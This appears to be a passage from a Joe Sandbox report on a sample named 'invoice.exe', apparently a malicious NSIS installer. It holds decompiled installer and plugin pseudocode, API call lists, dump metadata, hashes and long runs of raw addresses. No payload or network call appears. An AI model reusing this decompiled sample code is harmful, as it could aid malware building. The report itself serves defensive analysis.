                                            					_push("true");
                                            					E00404026(_t166);
                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                            					_push(0x14);
                                            					E00404026(_t166);
                                            					E0040405B(_t165);
                                            					_t138 = E004062FD(7);
                                            					if(_t138 == 0) {
                                            						L53:
                                            						return E0040408D(_a8, _a12, _a16);
                                            					} else {
                                            						 *_t138(_t165, "true");
                                            						goto L8;
                                            					}
                                            				}
                                            			}

                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 004044E5
                                            • SetWindowTextA.USER32(00000000,-00430000), ref: 0040450F
                                            • SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045C0
                                            • CoTaskMemFree.OLE32(00000000), ref: 004045CB
                                            • lstrcmpiA.KERNEL32(Call,Yllerion Setup: Installing), ref: 004045FD
                                            • lstrcatA.KERNEL32(-00430000,Call), ref: 00404609
                                            • SetDlgItemTextA.USER32(?,000003FB,-00430000), ref: 0040461B
                                              • Part of subcall function 00405665: GetDlgItemTextA.USER32(?,?,00000400,00404652), ref: 00405678
                                              • Part of subcall function 004061CF: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\invoice.exe",76793410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406227
                                              • Part of subcall function 004061CF: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406234
                                              • Part of subcall function 004061CF: CharNextA.USER32(?,"C:\Users\user\Desktop\invoice.exe",76793410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406239
                                              • Part of subcall function 004061CF: CharPrevA.USER32(?,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406249
                                            • GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,-00430000,?,00429840,-00430000,-00430000,000003FB,-00430000), ref: 004046D9
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046F4
                                              • Part of subcall function 0040484D: lstrlenA.KERNEL32(Yllerion Setup: Installing,Yllerion Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,-00430000), ref: 004048EB
                                              • Part of subcall function 0040484D: wsprintfA.USER32 ref: 004048F3
                                              • Part of subcall function 0040484D: SetDlgItemTextA.USER32(?,Yllerion Setup: Installing), ref: 00404906
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository$Call$Yllerion Setup: Installing$g
                                            • API String ID: 2624150263-2546930237
                                            • Opcode ID: 032b3df766434426d98d5d6b576ada36a61d7b9502b5faa4e1f3676bff7237ef
                                            • Instruction ID: e7c3eafb31c7d15e6a6da749512948d226074c80576101813d8e7fa34d4e7a23
                                            • Opcode Fuzzy Hash: 032b3df766434426d98d5d6b576ada36a61d7b9502b5faa4e1f3676bff7237ef
                                            • Instruction Fuzzy Hash: 44A190B1900209ABDB11AFA6CD45AAFB7B8EF85314F14843BF605B72D1D77C89418B2D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E10001A5D() {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				CHAR* _v24;
                                            				CHAR* _v28;
                                            				signed int _v32;
                                            				signed int _v36;
                                            				signed int _v40;
                                            				CHAR* _v44;
                                            				signed int _v48;
                                            				void* _v52;
                                            				intOrPtr _v56;
                                            				CHAR* _t198;
                                            				signed int _t201;
                                            				void* _t203;
                                            				void* _t205;
                                            				CHAR* _t207;
                                            				void* _t215;
                                            				struct HINSTANCE__* _t216;
                                            				struct HINSTANCE__* _t217;
                                            				struct HINSTANCE__* _t219;
                                            				signed short _t221;
                                            				struct HINSTANCE__* _t224;
                                            				struct HINSTANCE__* _t226;
                                            				void* _t227;
                                            				char* _t228;
                                            				void* _t239;
                                            				signed char _t240;
                                            				signed int _t241;
                                            				struct HINSTANCE__* _t247;
                                            				void* _t248;
                                            				signed int _t250;
                                            				signed int _t252;
                                            				signed int _t258;
                                            				void* _t259;
                                            				signed int _t262;
                                            				signed int _t265;
                                            				signed int _t266;
                                            				signed int _t271;
                                            				signed int _t272;
                                            				signed int _t273;
                                            				signed int _t274;
                                            				void* _t277;
                                            				void* _t281;
                                            				struct HINSTANCE__* _t283;
                                            				signed char _t286;
                                            				void _t287;
                                            				signed int _t288;
                                            				signed int _t300;
                                            				signed int _t301;
                                            				signed char _t307;
                                            				signed int _t308;
                                            				CHAR* _t309;
                                            				CHAR* _t311;
                                            				CHAR* _t312;
                                            				struct HINSTANCE__* _t313;
                                            				void* _t315;
                                            				signed int _t316;
                                            				void* _t317;
                                            
                                            				_t283 = 0;
                                            				_v32 = 0;
                                            				_v36 = 0;
                                            				_v16 = 0;
                                            				_v8 = 0;
                                            				_v40 = 0;
                                            				_t317 = 0;
                                            				_v48 = 0;
                                            				_t198 = E10001215();
                                            				_v24 = _t198;
                                            				_v28 = _t198;
                                            				_v44 = E10001215();
                                            				_t308 = E1000123B();
                                            				_v52 = _t308;
                                            				_v12 = _t308;
                                            				while(1) {
                                            					_t201 = _v32;
                                            					_v56 = _t201;
                                            					if(_t201 != _t283 && _t317 == _t283) {
                                            						break;
                                            					}
                                            					_t307 =  *_t308;
                                            					_t286 = _t307;
                                            					_t203 = _t286 - _t283;
                                            					if(_t203 == 0) {
                                            						_t33 =  &_v32;
                                            						 *_t33 = _v32 | 0xffffffff;
                                            						__eflags =  *_t33;
                                            						L17:
                                            						_t205 = _v56 - _t283;
                                            						if(_t205 == 0) {
                                            							 *_v28 =  *_v28 & 0x00000000;
                                            							__eflags = _t317 - _t283;
                                            							if(_t317 == _t283) {
                                            								_t317 = GlobalAlloc(0x40, 0x14a4);
                                            								 *(_t317 + 0x810) = _t283;
                                            								 *(_t317 + 0x814) = _t283;
                                            							}
                                            							_t287 = _v36;
                                            							_t43 = _t317 + 8; // 0x8
                                            							_t207 = _t43;
                                            							_t44 = _t317 + 0x408; // 0x408
                                            							_t309 = _t44;
                                            							 *_t317 = _t287;
                                            							 *_t207 =  *_t207 & 0x00000000;
                                            							 *(_t317 + 0x808) = _t283;
                                            							 *_t309 =  *_t309 & 0x00000000;
                                            							_t288 = _t287 - _t283;
                                            							__eflags = _t288;
                                            							 *(_t317 + 0x80c) = _t283;
                                            							 *(_t317 + 4) = _t283;
                                            							if(_t288 == 0) {
                                            								__eflags = _v28 - _v24;
                                            								if(_v28 == _v24) {
                                            									goto L39;
                                            								}
                                            								_t315 = 0;
                                            								GlobalFree(_t317);
                                            								_t317 = E100012FE(_v24);
                                            								__eflags = _t317 - _t283;
                                            								if(_t317 == _t283) {
                                            									goto L39;
                                            								} else {
                                            									goto L32;
                                            								}
                                            								while(1) {
                                            									L32:
                                            									_t239 =  *(_t317 + 0x14a0);
                                            									__eflags = _t239 - _t283;
                                            									if(_t239 == _t283) {
                                            										break;
                                            									}
                                            									_t315 = _t317;
                                            									_t317 = _t239;
                                            									__eflags = _t317 - _t283;
                                            									if(_t317 != _t283) {
                                            										continue;
                                            									}
                                            									break;
                                            								}
                                            								__eflags = _t315 - _t283;
                                            								if(_t315 != _t283) {
                                            									 *(_t315 + 0x14a0) = _t283;
                                            								}
                                            								_t240 =  *(_t317 + 0x810);
                                            								__eflags = _t240 & 0x00000008;
                                            								if((_t240 & 0x00000008) == 0) {
                                            									_t241 = _t240 | 0x00000002;
                                            									__eflags = _t241;
                                            									 *(_t317 + 0x810) = _t241;
                                            								} else {
                                            									_t317 = E10001534(_t317);
                                            									 *(_t317 + 0x810) =  *(_t317 + 0x810) & 0xfffffff5;
                                            								}
                                            								goto L39;
                                            							} else {
                                            								_t300 = _t288 - 1;
                                            								__eflags = _t300;
                                            								if(_t300 == 0) {
                                            									L28:
                                            									lstrcpyA(_t207, _v44);
                                            									L29:
                                            									lstrcpyA(_t309, _v24);
                                            									L39:
                                            									_v12 = _v12 + 1;
                                            									_v28 = _v24;
                                            									L63:
                                            									if(_v32 != 0xffffffff) {
                                            										_t308 = _v12;
                                            										continue;
                                            									}
                                            									break;
                                            								}
                                            								_t301 = _t300 - 1;
                                            								__eflags = _t301;
                                            								if(_t301 == 0) {
                                            									goto L29;
                                            								}
                                            								__eflags = _t301 != 1;
                                            								if(_t301 != 1) {
                                            									goto L39;
                                            								}
                                            								goto L28;
                                            							}
                                            						}
                                            						if(_t205 != 1) {
                                            							goto L39;
                                            						}
                                            						_t247 = _v16;
                                            						if(_v40 == _t283) {
                                            							_t247 = _t247 - 1;
                                            						}
                                            						 *(_t317 + 0x814) = _t247;
                                            						goto L39;
                                            					}
                                            					_t248 = _t203 - 0x23;
                                            					if(_t248 == 0) {
                                            						__eflags = _t308 - _v52;
                                            						if(_t308 <= _v52) {
                                            							L15:
                                            							_v32 = _t283;
                                            							_v36 = _t283;
                                            							goto L17;
                                            						}
                                            						__eflags =  *((char*)(_t308 - 1)) - 0x3a;
                                            						if( *((char*)(_t308 - 1)) != 0x3a) {
                                            							goto L15;
                                            						}
                                            						__eflags = _v32 - _t283;
                                            						if(_v32 == _t283) {
                                            							L40:
                                            							_t250 = _v32 - _t283;
                                            							__eflags = _t250;
                                            							if(_t250 == 0) {
                                            								__eflags = _t307 - 0x2a;
                                            								if(_t307 == 0x2a) {
                                            									_v36 = 2;
                                            									L61:
                                            									_t308 = _v12;
                                            									_v28 = _v24;
                                            									_t283 = 0;
                                            									__eflags = 0;
                                            									L62:
                                            									_t316 = _t308 + 1;
                                            									__eflags = _t316;
                                            									_v12 = _t316;
                                            									goto L63;
                                            								}
                                            								__eflags = _t307 - 0x2d;
                                            								if(_t307 == 0x2d) {
                                            									L132:
                                            									_t252 = _t308 + 1;
                                            									__eflags =  *_t252 - 0x3e;
                                            									if( *_t252 != 0x3e) {
                                            										L134:
                                            										_t252 = _t308 + 1;
                                            										__eflags =  *_t252 - 0x3a;
                                            										if( *_t252 != 0x3a) {
                                            											L141:
                                            											_v28 =  &(_v28[1]);
                                            											 *_v28 = _t307;
                                            											goto L62;
                                            										}
                                            										__eflags = _t307 - 0x2d;
                                            										if(_t307 == 0x2d) {
                                            											goto L141;
                                            										}
                                            										_v36 = 1;
                                            										L137:
                                            										_v12 = _t252;
                                            										__eflags = _v28 - _v24;
                                            										if(_v28 <= _v24) {
                                            											 *_v44 =  *_v44 & 0x00000000;
                                            										} else {
                                            											 *_v28 =  *_v28 & 0x00000000;
                                            											lstrcpyA(_v44, _v24);
                                            										}
                                            										goto L61;
                                            									}
                                            									_v36 = 3;
                                            									goto L137;
                                            								}
                                            								__eflags = _t307 - 0x3a;
                                            								if(_t307 != 0x3a) {
                                            									goto L141;
                                            								}
                                            								__eflags = _t307 - 0x2d;
                                            								if(_t307 != 0x2d) {
                                            									goto L134;
                                            								}
                                            								goto L132;
                                            							}
                                            							_t258 = _t250 - 1;
                                            							__eflags = _t258;
                                            							if(_t258 == 0) {
                                            								L74:
                                            								_t259 = _t286 - 0x22;
                                            								__eflags = _t259 - 0x55;
                                            								if(_t259 > 0x55) {
                                            									goto L61;
                                            								}
                                            								switch( *((intOrPtr*)(( *(_t259 + 0x1000215a) & 0x000000ff) * 4 +  &M100020F6))) {
                                            									case 0:
                                            										__eax = _v24;
                                            										__edi = _v12;
                                            										while(1) {
                                            											__edi = __edi + 1;
                                            											_v12 = __edi;
                                            											__cl =  *__edi;
                                            											__eflags = __cl - __dl;
                                            											if(__cl != __dl) {
                                            												goto L116;
                                            											}
                                            											L115:
                                            											__eflags =  *(__edi + 1) - __dl;
                                            											if( *(__edi + 1) != __dl) {
                                            												L120:
                                            												 *__eax =  *__eax & 0x00000000;
                                            												__ebx = E10001224(_v24);
                                            												goto L91;
                                            											}
                                            											L116:
                                            											__eflags = __cl;
                                            											if(__cl == 0) {
                                            												goto L120;
                                            											}
                                            											__eflags = __cl - __dl;
                                            											if(__cl == __dl) {
                                            												__edi = __edi + 1;
                                            												__eflags = __edi;
                                            											}
                                            											__cl =  *__edi;
                                            											 *__eax =  *__edi;
                                            											__eax = __eax + 1;
                                            											__edi = __edi + 1;
                                            											_v12 = __edi;
                                            											__cl =  *__edi;
                                            											__eflags = __cl - __dl;
                                            											if(__cl != __dl) {
                                            												goto L116;
                                            											}
                                            											goto L115;
                                            										}
                                            									case 1:
                                            										_v8 = 1;
                                            										goto L61;
                                            									case 2:
                                            										_v8 = _v8 | 0xffffffff;
                                            										goto L61;
                                            									case 3:
                                            										_v8 = _v8 & 0x00000000;
                                            										_v20 = _v20 & 0x00000000;
                                            										_v16 = _v16 + 1;
                                            										goto L79;
                                            									case 4:
                                            										__eflags = _v20;
                                            										if(_v20 != 0) {
                                            											goto L61;
                                            										}
                                            										_v12 = _v12 - 1;
                                            										__ebx = E10001215();
                                            										 &_v12 = E100019FB( &_v12);
                                            										__eax = E10001429(__edx, __eax, __edx, __ebx);
                                            										goto L91;
                                            									case 5:
                                            										L99:
                                            										_v20 = _v20 + 1;
                                            										goto L61;
                                            									case 6:
                                            										_push(7);
                                            										goto L107;
                                            									case 7:
                                            										_push(0x19);
                                            										goto L127;
                                            									case 8:
                                            										_push(0x15);
                                            										goto L127;
                                            									case 9:
                                            										_push(0x16);
                                            										goto L127;
                                            									case 0xa:
                                            										_push(0x18);
                                            										goto L127;
                                            									case 0xb:
                                            										_push(5);
                                            										goto L107;
                                            									case 0xc:
                                            										__eax = 0;
                                            										__eax = 1;
                                            										goto L85;
                                            									case 0xd:
                                            										_push(6);
                                            										goto L107;
                                            									case 0xe:
                                            										_push(2);
                                            										goto L107;
                                            									case 0xf:
                                            										_push(3);
                                            										goto L107;
                                            									case 0x10:
                                            										_push(0x17);
                                            										L127:
                                            										_pop(__ebx);
                                            										goto L92;
                                            									case 0x11:
                                            										__eax =  &_v12;
                                            										__eax = E100019FB( &_v12);
                                            										__ebx = __eax;
                                            										__ebx = __eax + 1;
                                            										__eflags = __ebx - 0xb;
                                            										if(__ebx < 0xb) {
                                            											__ebx = __ebx + 0xa;
                                            										}
                                            										goto L91;
                                            									case 0x12:
                                            										__ebx = 0xffffffff;
                                            										goto L92;
                                            									case 0x13:
                                            										_v48 = _v48 + 1;
                                            										_push(3);
                                            										_pop(__eax);
                                            										goto L85;
                                            									case 0x14:
                                            										__eax = 0;
                                            										__eflags = 0;
                                            										goto L85;
                                            									case 0x15:
                                            										_push(4);
                                            										L107:
                                            										_pop(__eax);
                                            										L85:
                                            										__edi = _v16;
                                            										__ecx =  *(0x1000305c + __eax * 4);
                                            										__edi = _v16 << 5;
                                            										__edx = 0;
                                            										__edi = (_v16 << 5) + __esi;
                                            										__edx = 1;
                                            										__eflags = _v8 - 0xffffffff;
                                            										_v40 = 1;
                                            										 *(__edi + 0x818) = __eax;
                                            										if(_v8 == 0xffffffff) {
                                            											L87:
                                            											__ecx = __edx;
                                            											L88:
                                            											__eflags = _v8 - __edx;
                                            											 *(__edi + 0x828) = __ecx;
                                            											if(_v8 == __edx) {
                                            												__eax =  &_v12;
                                            												__eax = E100019FB( &_v12);
                                            												__eax = __eax + 1;
                                            												__eflags = __eax;
                                            												_v8 = __eax;
                                            											}
                                            											__eax = _v8;
                                            											 *((intOrPtr*)(__edi + 0x81c)) = _v8;
                                            											_t133 = _v16 + 0x41; // 0x41
                                            											_t133 = _t133 << 5;
                                            											__eax = 0;
                                            											__eflags = 0;
                                            											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
                                            											 *((intOrPtr*)(__edi + 0x830)) = 0;
                                            											 *((intOrPtr*)(__edi + 0x82c)) = 0;
                                            											goto L91;
                                            										}
                                            										__eflags = __ecx;
                                            										if(__ecx > 0) {
                                            											goto L88;
                                            										}
                                            										goto L87;
                                            									case 0x16:
                                            										_t261 =  *(_t317 + 0x814);
                                            										__eflags = _t261 - _v16;
                                            										if(_t261 > _v16) {
                                            											_v16 = _t261;
                                            										}
                                            										_v8 = _v8 & 0x00000000;
                                            										_v20 = _v20 & 0x00000000;
                                            										_v36 - 3 = _t261 - (_v36 == 3);
                                            										if(_t261 != _v36 == 3) {
                                            											L79:
                                            											_v40 = 1;
                                            										}
                                            										goto L61;
                                            									case 0x17:
                                            										__eax =  &_v12;
                                            										__eax = E100019FB( &_v12);
                                            										__ebx = __eax;
                                            										__ebx = __eax + 1;
                                            										L91:
                                            										__eflags = __ebx;
                                            										if(__ebx == 0) {
                                            											goto L61;
                                            										}
                                            										L92:
                                            										__eflags = _v20;
                                            										_v40 = 1;
                                            										if(_v20 != 0) {
                                            											L97:
                                            											__eflags = _v20 - 1;
                                            											if(_v20 == 1) {
                                            												__eax = _v16;
                                            												__eax = _v16 << 5;
                                            												__eflags = __eax;
                                            												 *(__eax + __esi + 0x82c) = __ebx;
                                            											}
                                            											goto L99;
                                            										}
                                            										_v16 = _v16 << 5;
                                            										_t141 = __esi + 0x830; // 0x830
                                            										__edi = (_v16 << 5) + _t141;
                                            										__eax =  *__edi;
                                            										__eflags = __eax - 0xffffffff;
                                            										if(__eax <= 0xffffffff) {
                                            											L95:
                                            											__eax = GlobalFree(__eax);
                                            											L96:
                                            											 *__edi = __ebx;
                                            											goto L97;
                                            										}
                                            										__eflags = __eax - 0x19;
                                            										if(__eax <= 0x19) {
                                            											goto L96;
                                            										}
                                            										goto L95;
                                            									case 0x18:
                                            										goto L61;
                                            								}
                                            							}
                                            							_t262 = _t258 - 1;
                                            							__eflags = _t262;
                                            							if(_t262 == 0) {
                                            								_v16 = _t283;
                                            								goto L74;
                                            							}
                                            							__eflags = _t262 != 1;
                                            							if(_t262 != 1) {
                                            								goto L141;
                                            							}
                                            							_t265 = _t286 - 0x21;
                                            							__eflags = _t265;
                                            							if(_t265 == 0) {
                                            								_v8 =  ~_v8;
                                            								goto L61;
                                            							}
                                            							_t266 = _t265 - 0x42;
                                            							__eflags = _t266;
                                            							if(_t266 == 0) {
                                            								L57:
                                            								__eflags = _v8 - 1;
                                            								if(_v8 != 1) {
                                            									_t92 = _t317 + 0x810;
                                            									 *_t92 =  *(_t317 + 0x810) &  !0x00000001;
                                            									__eflags =  *_t92;
                                            								} else {
                                            									 *(_t317 + 0x810) =  *(_t317 + 0x810) | 1;
                                            								}
                                            								_v8 = 1;
                                            								goto L61;
                                            							}
                                            							_t271 = _t266;
                                            							__eflags = _t271;
                                            							if(_t271 == 0) {
                                            								_push(0x20);
                                            								L56:
                                            								_pop(1);
                                            								goto L57;
                                            							}
                                            							_t272 = _t271 - 9;
                                            							__eflags = _t272;
                                            							if(_t272 == 0) {
                                            								_push(8);
                                            								goto L56;
                                            							}
                                            							_t273 = _t272 - 4;
                                            							__eflags = _t273;
                                            							if(_t273 == 0) {
                                            								_push(4);
                                            								goto L56;
                                            							}
                                            							_t274 = _t273 - 1;
                                            							__eflags = _t274;
                                            							if(_t274 == 0) {
                                            								_push(0x10);
                                            								goto L56;
                                            							}
                                            							__eflags = _t274 != 0;
                                            							if(_t274 != 0) {
                                            								goto L61;
                                            							}
                                            							_push(0x40);
                                            							goto L56;
                                            						}
                                            						goto L15;
                                            					}
                                            					_t277 = _t248 - 5;
                                            					if(_t277 == 0) {
                                            						__eflags = _v36 - 3;
                                            						_v32 = 1;
                                            						_v8 = _t283;
                                            						_v20 = _t283;
                                            						_v16 = (0 | _v36 == 0x00000003) + 1;
                                            						_v40 = _t283;
                                            						goto L17;
                                            					}
                                            					_t281 = _t277 - 1;
                                            					if(_t281 == 0) {
                                            						_v32 = 2;
                                            						_v8 = _t283;
                                            						_v20 = _t283;
                                            						goto L17;
                                            					}
                                            					if(_t281 != 0x16) {
                                            						goto L40;
                                            					} else {
                                            						_v32 = 3;
                                            						_v8 = 1;
                                            						goto L17;
                                            					}
                                            				}
                                            				GlobalFree(_v52);
                                            				GlobalFree(_v24);
                                            				GlobalFree(_v44);
                                            				if(_t317 == _t283 ||  *(_t317 + 0x80c) != _t283) {
                                            					L161:
                                            					return _t317;
                                            				} else {
                                            					_t215 =  *_t317 - 1;
                                            					if(_t215 == 0) {
                                            						_t178 = _t317 + 8; // 0x8
                                            						_t311 = _t178;
                                            						__eflags =  *_t311;
                                            						if( *_t311 != 0) {
                                            							_t216 = GetModuleHandleA(_t311);
                                            							__eflags = _t216 - _t283;
                                            							 *(_t317 + 0x808) = _t216;
                                            							if(_t216 != _t283) {
                                            								L150:
                                            								_t183 = _t317 + 0x408; // 0x408
                                            								_t312 = _t183;
                                            								_t217 = E100015A4( *(_t317 + 0x808), _t312);
                                            								__eflags = _t217 - _t283;
                                            								 *(_t317 + 0x80c) = _t217;
                                            								if(_t217 == _t283) {
                                            									__eflags =  *_t312 - 0x23;
                                            									if( *_t312 == 0x23) {
                                            										_t186 = _t317 + 0x409; // 0x409
                                            										_t221 = E100012FE(_t186);
                                            										__eflags = _t221 - _t283;
                                            										if(_t221 != _t283) {
                                            											__eflags = _t221 & 0xffff0000;
                                            											if((_t221 & 0xffff0000) == 0) {
                                            												 *(_t317 + 0x80c) = GetProcAddress( *(_t317 + 0x808), _t221 & 0x0000ffff);
                                            											}
                                            										}
                                            									}
                                            								}
                                            								__eflags = _v48 - _t283;
                                            								if(_v48 != _t283) {
                                            									L157:
                                            									_t312[lstrlenA(_t312)] = 0x41;
                                            									_t219 = E100015A4( *(_t317 + 0x808), _t312);
                                            									__eflags = _t219 - _t283;
                                            									if(_t219 != _t283) {
                                            										L145:
                                            										 *(_t317 + 0x80c) = _t219;
                                            										goto L161;
                                            									}
                                            									__eflags =  *(_t317 + 0x80c) - _t283;
                                            									L159:
                                            									if(__eflags != 0) {
                                            										goto L161;
                                            									}
                                            									L160:
                                            									_t196 = _t317 + 4;
                                            									 *_t196 =  *(_t317 + 4) | 0xffffffff;
                                            									__eflags =  *_t196;
                                            									goto L161;
                                            								} else {
                                            									__eflags =  *(_t317 + 0x80c) - _t283;
                                            									if( *(_t317 + 0x80c) != _t283) {
                                            										goto L161;
                                            									}
                                            									goto L157;
                                            								}
                                            							}
                                            							_t224 = LoadLibraryA(_t311);
                                            							__eflags = _t224 - _t283;
                                            							 *(_t317 + 0x808) = _t224;
                                            							if(_t224 == _t283) {
                                            								goto L160;
                                            							}
                                            							goto L150;
                                            						}
                                            						_t179 = _t317 + 0x408; // 0x408
                                            						_t226 = E100012FE(_t179);
                                            						 *(_t317 + 0x80c) = _t226;
                                            						__eflags = _t226 - _t283;
                                            						goto L159;
                                            					}
                                            					_t227 = _t215 - 1;
                                            					if(_t227 == 0) {
                                            						_t176 = _t317 + 0x408; // 0x408
                                            						_t228 = _t176;
                                            						__eflags =  *_t228;
                                            						if( *_t228 == 0) {
                                            							goto L161;
                                            						}
                                            						_t219 = E100012FE(_t228);
                                            						L144:
                                            						goto L145;
                                            					}
                                            					if(_t227 != 1) {
                                            						goto L161;
                                            					}
                                            					_t80 = _t317 + 8; // 0x8
                                            					_t284 = _t80;
                                            					_t313 = E100012FE(_t80);
                                            					 *(_t317 + 0x808) = _t313;
                                            					if(_t313 == 0) {
                                            						goto L160;
                                            					}
                                            					 *(_t317 + 0x84c) =  *(_t317 + 0x84c) & 0x00000000;
                                            					 *((intOrPtr*)(_t317 + 0x850)) = E10001224(_t284);
                                            					 *(_t317 + 0x83c) =  *(_t317 + 0x83c) & 0x00000000;
                                            					 *((intOrPtr*)(_t317 + 0x848)) = 1;
                                            					 *((intOrPtr*)(_t317 + 0x838)) = 1;
                                            					_t89 = _t317 + 0x408; // 0x408
                                            					_t219 =  *(_t313->i + E100012FE(_t89) * 4);
                                            					goto L144;
                                            				}
                                            			}
                                            0x10001da5
                                            0x10001da7
                                            0x10001dad
                                            0x10001dad
                                            0x10001dad
                                            0x00000000
                                            0x00000000
                                            0x10001ee2
                                            0x10001ee6
                                            0x10001eeb
                                            0x10001eee
                                            0x10001e47
                                            0x10001e47
                                            0x10001e49
                                            0x00000000
                                            0x00000000
                                            0x10001e4f
                                            0x10001e4f
                                            0x10001e53
                                            0x10001e5a
                                            0x10001e7e
                                            0x10001e7e
                                            0x10001e82
                                            0x10001e84
                                            0x10001e87
                                            0x10001e87
                                            0x10001e8a
                                            0x10001e8a
                                            0x00000000
                                            0x10001e82
                                            0x10001e5f
                                            0x10001e62
                                            0x10001e62
                                            0x10001e69
                                            0x10001e6b
                                            0x10001e6e
                                            0x10001e75
                                            0x10001e76
                                            0x10001e7c
                                            0x10001e7c
                                            0x00000000
                                            0x10001e7c
                                            0x10001e70
                                            0x10001e73
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10001d7f
                                            0x10001c41
                                            0x10001c41
                                            0x10001c42
                                            0x10001d67
                                            0x00000000
                                            0x10001d67
                                            0x10001c48
                                            0x10001c49
                                            0x00000000
                                            0x00000000
                                            0x10001c51
                                            0x10001c51
                                            0x10001c54
                                            0x10001c9f
                                            0x00000000
                                            0x10001c9f
                                            0x10001c56
                                            0x10001c56
                                            0x10001c59
                                            0x10001c83
                                            0x10001c86
                                            0x10001c89
                                            0x10001d59
                                            0x10001d59
                                            0x10001d59
                                            0x10001c8f
                                            0x10001c8f
                                            0x10001c8f
                                            0x10001d5f
                                            0x00000000
                                            0x10001d5f
                                            0x10001c5c
                                            0x10001c5c
                                            0x10001c5d
                                            0x10001c80
                                            0x10001c82
                                            0x10001c82
                                            0x00000000
                                            0x10001c82
                                            0x10001c5f
                                            0x10001c5f
                                            0x10001c62
                                            0x10001c7c
                                            0x00000000
                                            0x10001c7c
                                            0x10001c64
                                            0x10001c64
                                            0x10001c67
                                            0x10001c78
                                            0x00000000
                                            0x10001c78
                                            0x10001c69
                                            0x10001c69
                                            0x10001c6a
                                            0x10001c74
                                            0x00000000
                                            0x10001c74
                                            0x10001c6d
                                            0x10001c6e
                                            0x00000000
                                            0x00000000
                                            0x10001c70
                                            0x00000000
                                            0x10001c70
                                            0x00000000
                                            0x10001b20
                                            0x10001ac3
                                            0x10001ac6
                                            0x10001af5
                                            0x10001af9
                                            0x10001b00
                                            0x10001b07
                                            0x10001b0a
                                            0x10001b0d
                                            0x00000000
                                            0x10001b0d
                                            0x10001ac8
                                            0x10001ac9
                                            0x10001ae4
                                            0x10001aeb
                                            0x10001aee
                                            0x00000000
                                            0x10001aee
                                            0x10001ace
                                            0x00000000
                                            0x10001ad4
                                            0x10001ad4
                                            0x10001adb
                                            0x00000000
                                            0x10001adb
                                            0x10001ace
                                            0x10001cc4
                                            0x10001cc9
                                            0x10001cce
                                            0x10001cd2
                                            0x100020ef
                                            0x100020f5
                                            0x10001ce4
                                            0x10001ce6
                                            0x10001ce7
                                            0x1000201a
                                            0x1000201a
                                            0x1000201d
                                            0x10002020
                                            0x1000203d
                                            0x10002043
                                            0x10002045
                                            0x1000204b
                                            0x10002062
                                            0x10002062
                                            0x10002062
                                            0x1000206f
                                            0x10002075
                                            0x10002078
                                            0x1000207e
                                            0x10002080
                                            0x10002083
                                            0x10002085
                                            0x1000208c
                                            0x10002091
                                            0x10002094
                                            0x10002096
                                            0x1000209b
                                            0x100020ad
                                            0x100020ad
                                            0x1000209b
                                            0x10002094
                                            0x10002083
                                            0x100020b3
                                            0x100020b6
                                            0x100020c0
                                            0x100020c8
                                            0x100020d4
                                            0x100020da
                                            0x100020dd
                                            0x1000200f
                                            0x1000200f
                                            0x00000000
                                            0x1000200f
                                            0x100020e3
                                            0x100020e9
                                            0x100020e9
                                            0x00000000
                                            0x00000000
                                            0x100020eb
                                            0x100020eb
                                            0x100020eb
                                            0x100020eb
                                            0x00000000
                                            0x100020b8
                                            0x100020b8
                                            0x100020be
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100020be
                                            0x100020b6
                                            0x1000204e
                                            0x10002054
                                            0x10002056
                                            0x1000205c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000205c
                                            0x10002022
                                            0x10002029
                                            0x1000202f
                                            0x10002035
                                            0x00000000
                                            0x10002035
                                            0x10001ced
                                            0x10001cee
                                            0x10001ff9
                                            0x10001ff9
                                            0x10001fff
                                            0x10002002
                                            0x00000000
                                            0x00000000
                                            0x10002009
                                            0x1000200e
